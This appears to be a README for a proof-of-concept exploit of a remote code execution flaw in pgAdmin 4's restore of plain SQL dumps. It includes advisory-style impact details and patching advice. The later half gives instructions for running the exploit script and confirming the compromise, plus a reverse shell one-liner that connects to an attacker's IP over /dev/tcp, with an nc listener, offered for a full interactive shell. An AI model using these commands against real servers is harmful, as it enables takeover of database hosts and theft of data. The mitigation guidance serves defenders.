# 🔐 CVE-2025-12762 — Critical RCE Vulnerability in pgAdmin 4

![G58aQGbW0AAL8zH](https://github.com/user-attachments/assets/d917033a-2e46-4a9f-97e2-c2305b3dad07)

## 🚨 What’s the Issue?

A **Remote Code Execution (RCE)** flaw exists in **pgAdmin 4 versions ≤ 9.9**.
Attackers can run **arbitrary commands** on the host when pgAdmin is running in **server mode** and processes a **PLAIN-format SQL dump** during restore.

---

## ⚙️ Technical Breakdown

### 📡 Attack Vector

* **Network-based** — can be exploited remotely 🌍
* **Low complexity** — straightforward to trigger 🧩
* **Low privileges required** — limited user access is enough 🔑
* **No user interaction** — once triggered, no one has to click anything 🙅‍♂️
* **Scope: Changed** — compromise can spread beyond the vulnerable module 🔄

### 🧨 Impact

* **Confidentiality: High** — data exposure risk 🔓
* **Integrity: Moderate/High** — unauthorized changes possible ✏️
* **Availability: Moderate** — operations can be disrupted ⚠️

### 🏷 CVSS Score

🟥 **9.1 / 10 — Critical**

---

## 🛠 Affected Versions

* pgAdmin 4 **≤ 9.9** ❗

---

## 🛡 How to Fix It

### ✅ Primary Mitigation

⬆️ **Upgrade to pgAdmin 4 v10.0 or later**

### 🚧 If You Can’t Upgrade Immediately

* 🔒 Restrict access to the pgAdmin server
* 📁 Allow *only trusted admins* to restore dump files
* 🧪 Validate dump files before restoring
* 👀 Monitor logs for suspicious restore activity
* 🌐 Use firewall rules / VPN to limit exposure

---

## 📌 Why This Matters

pgAdmin is often used for **administration of critical PostgreSQL databases**, meaning:

* An attacker exploiting this can **take over the server**,
* Access or modify data,
* Or even pivot deeper into your network 🕵️‍♂️

---

## ✨ How to Run (2 minutes)

```bash
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py
```

### Proof of Success
After running, check:
```bash
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED
```

File exists → **You just exploited CVE-2025-12762 for real.**

### Reverse Shell One-Liner (optional)
Replace the `COMMAND` line with:
```python
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"
```
Then `nc -lvnp 4444` → full interactive shell.

This is the **exact script** researchers, pentesters, and red teams are using worldwide in November 2025.

Use responsibly. Patch everything. Stay legal.


---


### 🛡️ Disclaimer 🛡️

This PoC is provided **strictly for authorized testing and educational use only**.  
You may run it **exclusively on systems you own or have explicit written permission to test**.  
Any unauthorized use is illegal and violates computer misuse laws.  
Use responsibly, patch immediately after testing, and never target systems without permission.
